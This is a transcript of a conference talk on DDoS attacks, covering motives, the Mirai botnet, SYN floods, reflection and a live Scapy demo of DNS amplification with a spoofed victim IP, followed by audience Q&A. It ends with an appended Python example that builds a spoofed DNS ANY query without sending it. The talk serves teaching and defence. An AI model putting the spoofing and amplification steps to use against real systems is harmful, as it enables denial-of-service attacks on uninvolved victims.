
OK, so first I want to introduce myself. I started as a developer, later became an academic researcher at Ben-Gurion University in the machine learning and cyber security area. Now I'm working for a company that does DDoS mitigation, web application protection and automatic attack mitigation. One point I want to make is that what I say in this presentation is my opinion and not my company's. I'm sure you are all familiar with DDoS, but I want to do a quick introduction.

So what exactly is a DDoS? It is a denial of service attack, where the attacker tries to stop or deny access to some resource or service. So unlike other types of attacks that try to insert some backdoor or try to steal some information, these attacks try to drop your service and deny it to legitimate users. So let's look at the difference between DoS and DDoS. In DoS, mostly the attacker tries to use some exploit or vulnerability in the software design of your service or your system. DDoS attacks are distributed, so this is when a huge amount of traffic floods your system, or many requests, high bandwidth or something else, to try to exhaust some resource used by your system. If we look at DDoS attacks, we actually have two main types of DDoS attack. The first one is volumetric
attacks. Volumetric attacks try to exhaust the resources of your infrastructure, for example bandwidth: if you have a 10 gigabit pipe and they send more than 10 gigabits, your legitimate users will have some latency. Another kind of volumetric attack is packet-based attacks; this type tries to exhaust the resources of your network machines, like firewalls or routers. So this is how such attacks look in our systems. For example, on one side you can see a volumetric attack with 300 gigabits per second; even a huge company can be hit by such a thing. It's very nasty. Actually the biggest one I've seen is 470 gigabits per second, so it is just amazing how big it is. On the other side you can see a packets-per-second attack that reaches 200-some million packets per second, so your router or firewall may crash or start dropping traffic because it exhausts all its resources.

The other type of DDoS attack is layer 7 attacks, or application layer attacks. This type of attack tries to exhaust the resources of your server. For example, if you have a web server that can handle 1,000 concurrent connections and 1,001 clients try to access your server, you'll have some latency or maybe it will crash. Most of these attacks try to do two things: database attacks try to crash your database with many requests,
queries from search or login pages. And if you have a login on your page, its password procedure is CPU-bound, so if they try to brute force you with some random usernames and passwords, it will eat all the CPU of your server. So let's see an example from our systems of how an application layer attack looks. You can see the blue line is just humans, so that's the difference between the amount of human traffic and the bots. There is only half a million requests and it's enough to crash a very strong server. So what we do is try to distinguish between bots and humans with different classification techniques, so that you can stop the attack on the bots and let humans access the site.

An interesting statistic, a very important one: almost a quarter of attacks are multi-vector, meaning if I try to hit your server, I do it not only with an application layer attack, but attack through different layers to try to find the weak spot in the infrastructure of your system. On the other hand, you can see that 75 percent of attacks are only one vector, meaning some script kiddie, some person, just came by, hit the server and tried to attack it. Another interesting statistic is that almost 50 percent of servers were attacked more than once. This report is from our customers behind our protection service, so the attackers know
that they are protected, and they still continue to try to find weak spots and hit the service. So if you were hit once, you will probably be hit more and more and more until they succeed and crash your server.

So why do a DDoS attack? I can understand why to do a SQL injection: you can steal some credit card information. Why do remote code execution? You want to take control of the server. So any ideas why you would do something that just disrupts services? [audience suggestions] OK, so I'll summarize the reasons. The first one is business rivalry. If you have a competitor, for example the competitor of an ecommerce shop that sells some tools, and you want to take down your competitor's website, you can purchase DDoS for hire; it's very cheap, from 20 to 50 US dollars for one hour, and just take down your competitor so all the customers will come to you, or to another website, but not to your competitor. Another reason is extortion. It's very powerful: emails are sent to different web server owners saying that if you do not pay a couple of bitcoins, on average 15 bitcoins, sometimes it can be more, 100 bitcoin, we will DDoS your server, and they do small attacks for 10-15 minutes just to show the power and that they can do this DDoS attack. In many cases they claim to be groups like Anonymous, say that they have this power, but the mail comes from an anonymous source; we don't know if they are really connected to the group or not. So it's very, very common to be hit with extortion.

Another reason is hacktivism. So if someone doesn't like another group, for example in elections, the US, or some political matter, they will hit their website. And there are two main groups in the hacktivists: Anonymous, very famous, and Lizard Squad. Lizard Squad is more oriented to the gaming industry, so they hit gaming sites and gaming groups.
One more reason is state-sponsored attacks, or cyber warfare. A very good example for me: in 2007 Estonia was disconnected from the internet because Russia DDoSed their infrastructure. And for countries it's easier because they can cover themselves: if you throw some rockets or missiles at another country, you're exposed to the world, but if you do DDoS no one knows exactly where it comes from, and you can hit the other country's infrastructure with a very low budget, some thousands of dollars, unlike a fighter plane. One more reason is revenge. OK, so if you don't like some person, don't like some company, you can purchase a DDoS against their web service. It's very common between the gaming groups, or we have seen it in American football: when one team loses to another, a series of attacks hits the winner's site, and vice versa, just for revenge.

One more reason is a smokescreen. So we have seen a couple of cases where a DDoS attack came to some infrastructure company, so all the IT people ran to the mitigation to understand what happened and try to figure out this issue, but actually it was just a smokescreen to reach the backend and steal some confidential information. So DDoS can also be a smokescreen for a more sophisticated attack. And last but not least, fun: if you do it for fun, just to get some respect from
your friends. So if we are talking about DDoS, we can't not mention Mirai. It's not old news; it's been in the news for the last month, we got a botnet and attacks, so let's do a brief review of what happened. It started on September 21 when the cybersecurity journalist Krebs exposed a DDoS-for-hire group, vDOS, actually guys from my country, from Israel, and wrote a blog post about that. So the attack on his blog came with a huge amount of traffic; it was the biggest attack ever seen at the time. Later in September, shortly after, the source code was leaked to the web, the source code of the bot that attacked Krebs on Security. Later, on the 21st of October, Dyn, a domain hosting server, one of the biggest DNS hosting servers in the US, was hit by the attack, and they said that the attack came from Mirai, that Mirai bots were involved. Later there was a Twitter outage, connected with some information leaked via WikiLeaks, someone being disconnected from the internet and a DDoS attack that followed. So this is the news from the last month.

So what is Mirai? It's an IoT botnet; its source code was released on a hacking forum by a user named Anna-senpai. Mirai is Japanese, just a name taken from an anime. What's interesting about Mirai is that it
uses a very simple technique to infect machines. You don't send an email with some malicious link and hope someone will open it, you don't use any social engineering. You just scan all the internet, all the addresses, and look for telnet and SSH with default credentials. Actually it has a dictionary of 62 username/password pairs and tries to access these devices with them. And most of the devices are IP cameras manufactured in China, running a very simple BusyBox firmware; they don't close anything or change any default username and password. So you can just telnet to them with the default credentials, get a root shell, and you have a machine. From our research we found that there are more than one hundred thousand infected machines around the world, mostly in East Asia, also in South America, Europe and even very uncommon places like islands in the ocean, exotic places. It's easy to understand why this happens: because you can buy this camera on AliExpress, you don't care about the manufacturer, it's cheap, it does the work. When you get the camera you connect with your mobile phone to see the image, but you don't know whether it is protected. And once the camera is infected it can run different types of attacks. Let's look inside at how it works. For example it does SYN and TCP ACK attacks, STOMP attacks, UDP attacks, also
DNS as well as HTTP. What is interesting is the GRE flood. GRE is a protocol for tunneling: you encapsulate your packet, send it to the router and the router needs to decapsulate it; it has to know where to forward this packet. So if you do a DDoS attack through GRE tunnels you exhaust the resources of your router, because before it can drop any packet it has to check whether it is legitimate, and for that it needs to open it. So it costs your router. Another interesting thing is the anti-DDoS-protection tricks: they knew that during an attack the target could discover it and use a cloud for protection, so they do some manipulations on packets to bypass the detection systems. There are bypasses for specific DDoS protection services. Actually this is part of the code of Mirai, the killer module: when it infects a camera it looks for other bots on the same camera, for example Qbot, and tries to kill them to have all the power of this machine for itself. It also closes the telnet port, the SSH port, as well as the HTTP port, so no other competitor can reach this camera, and it keeps it for itself. This part of the code is from the CnC, so you can see the SQL queries that save the last attack. So you can purchase attacks from the botnet owner, based on bitcoins, and you have multiple attack types and a number of parameters.

And how it was connected to Dyn: Dyn confirmed that Mirai was the primary source of the attack. It was on the 21st and mostly used TCP and UDP flood attacks on port 53, since Dyn is the main host for DNS. So mostly it used DNS queries, and they sent packets at a rate 40 to 50 times the normal traffic. So even such big companies as Twitter and GitHub, which host their domains using Dyn, can be hit by DDoS and can't handle it, crashing.
So let's understand how we can do a DDoS attack. First of all let's talk about application layer attacks. Let's do a brief recap of the application layer. We have HTTP; for example this is a POST request: you have a URL path, also the method (you can use different methods), HTTP headers about the client, user agent, accept language etc., and POST data. So what we do is just send this information to our web host; the web server resolves it and sends us a response. So what type of flood can be done? The simplest is the botnet, for example Mirai, sending requests to the victim server. A server can handle some capacity of concurrent requests; if you have a botnet that contains 100 thousand bots, probably even a big server can't handle it. Another thing that attackers do: they try to find the weak spots in your web page. For example, this page contains a large image, so if it's not cached and they request it more and more over HTTP, they use up the traffic. As I mentioned before, if you have a search you need some SQL queries, so you can make a lot of searches to exhaust the database resources. And the login exhausts the CPU resources. So all these can be used by the attacker to take down your server.

Another type of attack is volumetric attacks. Let's do a quick recap of all the layers. We'll not talk
about layers 1 and 2; we'll talk about layers 3 and 4: the network layer, so the IP protocol, and the transport layer, so mostly TCP and UDP. So how do attackers work on these layers? First of all, SYN flood, used all the time. For example, the attacker wants to do a SYN flood; he sends a packet saying "hi, I'm 1.1.1.1", but this packet is spoofed. Because this is the first packet that is sent in the three-way handshake used by TCP, when the packet is sent to the victim, the victim needs to store all the connections and keep their state in a table. So it opens the connection and sends the response to the real 1.1.1.1, which has no idea what is happening; it gets a SYN-ACK. Then the attacker floods with these same connections, so the table of open connections in the victim server grows and grows until it's exhausted and probably the machine will crash.

Another type of attack is actually very simple: you just switch between the SYN flag, the ACK flag and the other TCP flags, and you send a lot of packets. This is the way all the packet-based attacks work: they send a lot of packets to the victim, because on the network level we can't let the server decide if a packet is legitimate or not; you need to check it before you drop it, so it eats the resources. The attack can also be done with
reflection. In reflection, what we do is take a SYN packet and send it to someone else, with the source spoofed. For example, I am the victim and the attacker sends to two other hosts, so all the hosts respond with SYN-ACK to the victim, and the victim can't distinguish between the legit and not legit users because they come from a distributed network, from distributed sources.

One more attack is DNS amplification, very, very common; it was used in many big attacks. What happens in this attack: DNS works with a request about a domain sent to the DNS server, and the DNS server responds with the result to the requester. So what happens here is just amplification, because the request is very small, you just ask for information about some domain, but the response can be ten times bigger, because it contains information about the name servers, the mail servers, and the IP addresses, IPv4 and IPv6. So if you send a small packet, the response will be much, much bigger, in bandwidth as well as in packets. So I want to show a small demo about DNS amplification and how easily it can be done using two tools. All we need is Wireshark, the Swiss army knife for all the network engineers and security researchers: you capture the packets and see what's going on inside. And the other tool is Scapy, written in Python, so it's
multi-platform, and with Scapy you can make your own packet, put whatever you want in the fields inside, and just send it over a socket. So I'll switch to the demo. We need three machines: one machine is the attacker, so we use Kali; another machine will be the victim, a Windows machine; and the third one is our DNS server.

So this is our DNS server; we have here a simple BIND server. You can see here the zone file with the information the server stores about some domain, so we use it for our amplification. Now, this machine is Windows; let's just check that its IP is 10.0.2.4. OK, and we have here Wireshark capturing, with a filter for the traffic that comes from our DNS server, so that's 10.0.2.5. OK, and this is the attacker, Kali, so its IP is 10.0.2.6. So let's start Scapy. First of all we need to create the different types of packets: IP, UDP and DNS. So if you don't remember what fields you can fill in a Scapy packet, you can display it, for example IP().display(): as you can see, the version is 4, and the source and destination IP by default are both 127.0.0.1. So first of all we want to reach our DNS server, so the dst IP is 10.0.2.5, and let's fill out the DNS query. OK, so we need to write the domain name, and we want to ask not only for the A record but for all records, so set the DNS qtype to 255, so we'll get all the records, and we want a recursive query, so rd = 1. So now we have a DNS query and we put it inside our DNS packet.
OK, and let's send it to our DNS server and see what it responds. Something is happening with the demo... oh my god. When you come to present, it stops working. OK, so we have a response from the DNS server with all the information. So let's see what the difference in size is. If I check the size of our request, it's 56, very small, but the size of the response is 639, so it's more than 10 times bigger. So if we switch the source IP to a spoofed IP, the 639 bytes will go to the victim when the attacker sends just 56. So let's do it: let's set the IP source to the IP of the Windows machine, OK, and let's try to send the packet. So let's check the Windows machine. As you can see, the Windows machine received all the response from our DNS server, because on top of UDP no one cares about a three-way handshake, so you can spoof your IP to be the victim's and the response goes to the victim. So let's do it in a loop and send it. This way we can send many, many requests that will reach the machine. So I wrote a small script; it does exactly the same as I showed you but with a while loop, so we'll send 1,000 requests to the machine. So let's see what happens on our Windows machine: it starts to receive a lot of traffic. OK, and this was my demo; as you can see, DNS amplification is very, very easy.
So I want to say obrigado, and if you have any questions...

Q: Isn't it the responsibility of the internet provider? The ISPs see all the traffic coming through; how much do they deal with it?

A: It depends on your contract with your ISP. Most of the ISPs say that if you have a one gigabit deal, that's what you get; they will not filter your traffic, and the amount above that is dropped.

Q: But the attack was just gigabits per second?

A: Yes, and then there was another one, about one terabit per second.

Q: Moving on to the weaknesses of the protocols, the DNS and UDP that you referred to: what is your opinion about DDoS protection in the future?

A: It's my opinion, because I work in a company that does DDoS protection of this kind, so I mean, if you want to do this protection, first of all you need to remember and understand what your weak spots are. If you need to protect your infrastructure you need to care about protection, maybe some BGP and on-demand protection. If you have a web server you need to think about application layer protection. And I'm sure you can try it, but you need to validate what your contract includes.

Yes, the question was: in the same steps, even the DDoS protection company, Akamai, that was protecting Brian Krebs' website told him "we can't protect you anymore, it will compromise our other customers, so you are out". In the case of Krebs, he was a free customer of Akamai, so it cost them a lot of money to handle this attack; that's why they dropped him. But if you purchase DDoS protection, for example unlimited DDoS protection, you get unlimited mitigation, and you see these systems, on-premise or cloud, can handle such amounts of traffic. For example, we can handle more than 200 gigabits per second of traffic at any moment.
To answer your question: we can handle it, but most companies can't handle it; that's why they need to purchase DDoS protection.

Q: Let's suppose that Krebs was actually purchasing the service. There's still the problem that the DDoS attack is compromising the other clients, and from a purely economic perspective they're losing money; their actual problem lies in the business of keeping that client, which is not proportionate to the amount of resources he's using up. Up to what point do they expect you to keep that service running and not just drop the client, even though he's a problem?

A: So first of all, this is a business model, Akamai's business model, OK? I don't agree with this business model. We saw what happened with Krebs: when one client gets DDoSed, other clients also suffer from this attack. Let's say it's Akamai's problem. In our case, what we're doing: we use anycast; when one of our clients suffers from a DDoS attack, the other clients are completely separated, they have different IP ranges, so they don't suffer from this attack.

Q: But they are on the same network; when one client is attacked, the DDoS hits the same infrastructure?

A: Yes, but we do anycast, so the traffic goes back to all our PoPs around the world, so it becomes more distributed and we can handle it. And our customers have their own IPs, so other IPs can be separated to different PoPs so they don't suffer from this attack.

Q: So the problem is, you can handle it up to a point; the thing is there is always a bigger botnet, there are always more clients, there's always more bandwidth. So let's assume you actually reach the limit at which you cannot physically handle it.

A: If the attack reaches that, our company also crashes. But all the time we try to be one step ahead of the biggest attacks. So if the biggest attack was one terabit, at a French ISP,
so we set targets: we need more bandwidth, we need more equipment. We actually have our own hardware and software, so we all the time look forward to handling even bigger, more aggressive attacks.

Q: With the proliferation of these recent massive fiber networks and domestic connections that are at minimum over a hundred megabits per second, and even gigabit connections, you can assume that the amount of bandwidth distributed clients have will eventually surpass the one available to you.

A: So let's assume that they have a huge amount of traffic, but they need some pipes to send this traffic, and we use the same ISPs to receive this traffic, so the bandwidth is not the problem. OK, so if there is, let's say, an isolated case, for example some ISP that doesn't have this amount of capacity and something bad happens, we also connect our system to other ISPs or exchange services.

Q: To what point will an ISP, for instance, black-hole another ISP? Let's say some nationalized, say Russian, ISP or something is the main source of the distributed DoS attack and we're talking about a huge amount of bandwidth; it's considerable, you have to have a lot of server management to stop it, etc. Will there ever be a limit at which you actually black-hole the ISP?

A: We don't do black-holing, and it's not important; I don't know, the ISPs exchange the traffic between themselves. But think about it: if the attacker has the resources to send this traffic, yeah, even if it's amplification, OK, the DNS servers have to reply to this request, and we have to handle this reply. So on the other side we can take all this traffic because we can have the same amount of bandwidth.

Q: Actually I'm one of your customers, so far happy. My question is more about what we can do when we are
not targeted but the underlying infrastructure is, which was the case with Dyn, and all the side effects affect us. Do you have any advice?

A: Let me see if I understand: you are our web application protection customer, owner of such a web application and infrastructure...

Q: So we can imagine that, like this DNS amplification attack, you do not defend us against that; it's just a side effect. So what could you give us as the ultimate tips or suggestions for when we are not directly targeted? We pay for protection from direct attacks, but we don't pay to be protected from those, let's say, side effects of big attacks on the internet infrastructure.

A: OK, so I'll give you the best answer I can. From my point of view, if you have DNS, with DNS amplification, if you are attacked by DNS amplification there is no problem, because we filter the traffic; for example if you have an IP that should receive only TCP traffic, there is no problem, DNS amplification can be filtered, it's UDP traffic.

Q: My point is I'm not being targeted; it's not actually my domain or whatever, but I'm affected by an attack that is affecting either the big pipe serving my country or something. So it's not actually your job to protect us against that; it's a side effect, like collateral. But still, as security partners, you always look at this. So what should we do, or what can we do, to be sure that, like the US and Europe, Germany, which were not targeted at all but were affected eventually... I can think of, for instance, not relying on the external DNS infrastructure and having our own; these are the usual precautions against degradation, I would say. But what happens when you find that my customers in Africa that need to reach my servers in Europe are affected? I can think of, like, routing somehow the traffic through other points of the
countries, but we don't have tools to effectively do it; for instance, we don't know...

A: I understand your question, but I think I don't have a good answer for you. This question needs to be directed to our product manager; they can explain exactly how to route the traffic, and what the way is, especially for this kind of side effect, how to handle it.

Q: What I would say is sharing information. You guys must be able to know, around the world, you said your customers are around the world, so you might know what is effective and helps locally. I mean, the way you react can also be helped by sharing information about what's going well and what's not going well around the world, so we can try to react.

A: Let me answer: we have 24/7 support on the server side if you suffer from some issue.

Q: Yeah, I meant more generally; I'm not complaining about your service, that's not my point. I mean in general the industry could have such options of giving information and also helping people to contact them to react.

A: Yes, we do as much as we can: we have blog posts, so we share all the information we can share. For example, about what happened at Dyn, you can check our blog posts about the DDoS attacks; that's the way we can share the information we have with you.
Q: I was under a DDoS attack, and one of the best questions I had was: when does it stop? All I could tell was that it was still running, and whether they succeed, or when they give up. For me they would give up when it doesn't work, but I could not find anything anywhere. Maybe you have some insight to share on what's going on and what to expect for this kind of attack, when someone goes somewhere where they can buy a DDoS.

A: So I want to answer the first question, when it stops: we have seen an attack going on for one month, nonstop, so it can be very, very long. And about the cause: in many cases someone in the open purchases a DDoS-for-hire attack and does not understand whether you are protected or not, what size your system is; they just know that they want to hit you and they don't care about the results until they check. So they'll probably try two times, five times, and only then understand that you're protected and there's no point in trying. Thank you. So if you have more
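The DNS amplification demo from the talk, reconstructed as an added pure-Python example; this is not code from the talk and does not use Scapy. It builds the same recursive ANY query the speaker built (qtype 255, rd = 1), parses a constructed sample response, computes the amplification factor, and shows what "switch the source IP" means at the packet level by encoding an IPv4/UDP header whose source is the victim. Nothing is sent and no raw socket is opened. The addresses 10.0.2.4 (victim) and 10.0.2.5 (resolver) follow the demo; the domain example.com and every record in the sample response are constructed values, not the speaker's zone file.

```python
"""Added example: a pure-Python model of the talk's Scapy demo.
Builds a recursive DNS ANY query, parses a constructed response, computes
the amplification factor, and encodes an IPv4/UDP frame with a spoofed
source address. Nothing is sent; no raw sockets are opened."""
import socket
import struct

DNS_TYPE_A, DNS_TYPE_NS, DNS_TYPE_SOA = 1, 2, 6
DNS_TYPE_MX, DNS_TYPE_TXT, DNS_TYPE_AAAA, DNS_TYPE_ANY = 15, 16, 28, 255
DNS_CLASS_IN = 1


def encode_name(name):
    """Wire-format a dotted name: length-prefixed labels, zero-terminated."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_dns_query(name, qtype=DNS_TYPE_ANY, txid=0x1234, rd=True):
    """Same bytes as Scapy's DNS(rd=1, qd=DNSQR(qname=name, qtype=255))."""
    flags = 0x0100 if rd else 0  # RD bit asks the resolver to recurse
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, DNS_CLASS_IN)


def build_dns_response(query, answers):
    """Constructed reply: echo the question, append one RR per (type, rdata).
    Each RR points back at the question name (0xC00C), class IN, TTL 3600."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0)  # QR|RD|RA
    question = query[12:]
    rrs = b"".join(struct.pack("!HHHIH", 0xC00C, rtype, DNS_CLASS_IN, 3600,
                               len(rdata)) + rdata for rtype, rdata in answers)
    return header + question + rrs


def sample_answers():
    """Constructed record set for example.com (sample values, not a real zone)."""
    return [
        (DNS_TYPE_A, socket.inet_aton("93.184.216.34")),
        (DNS_TYPE_AAAA, socket.inet_pton(socket.AF_INET6,
                                         "2606:2800:220:1:248:1893:25c8:1946")),
        (DNS_TYPE_NS, encode_name("ns1.example.com.")),
        (DNS_TYPE_NS, encode_name("ns2.example.com.")),
        (DNS_TYPE_MX, struct.pack("!H", 10) + encode_name("mail.example.com.")),
        (DNS_TYPE_TXT, b"\x0bv=spf1 -all"),  # one 11-byte character-string
        (DNS_TYPE_SOA, encode_name("ns1.example.com.")
                       + encode_name("hostmaster.example.com.")
                       + struct.pack("!IIIII", 2016102101, 7200, 3600, 1209600, 3600)),
    ]


def parse_dns_header(data):
    """Decode the 12-byte DNS header into its fields."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    return {"id": txid, "qr": flags >> 15, "rcode": flags & 0xF,
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def amplification_factor(query, response):
    """Bytes the resolver emits per byte the attacker sends."""
    return len(response) / len(query)


def ipv4_checksum(header):
    """RFC 1071 one's-complement sum; returns 0 when run over a correct header."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_udp(src, dst, sport, dport, payload):
    """IPv4 + UDP encapsulation. `src` is whatever the caller writes, which is
    the whole trick: UDP has no handshake, so a forged source is never checked
    and the resolver's reply goes to `src` (the demo's Windows victim)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload  # UDP csum 0 = omitted
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    return ip + udp


def parse_ipv4_src(frame):
    """Source address as a resolver (or the victim) would read it."""
    return socket.inet_ntoa(frame[12:16])


if __name__ == "__main__":
    q = build_dns_query("example.com.")
    r = build_dns_response(q, sample_answers())
    frame = build_ipv4_udp("10.0.2.4", "10.0.2.5", 40000, 53, q)  # src = victim
    print(len(q), len(r), round(amplification_factor(q, r), 2), parse_ipv4_src(frame))
```

The numbers differ from the 56/639 in the demo only because the sample zone is smaller; the mechanism is the same, and the check a defender wants is visible in the code: the reply is addressed purely by the IPv4 source field, so an IP that never sends DNS queries should never see UDP/53 replies, which is the filter the speaker describes later in the Q&A.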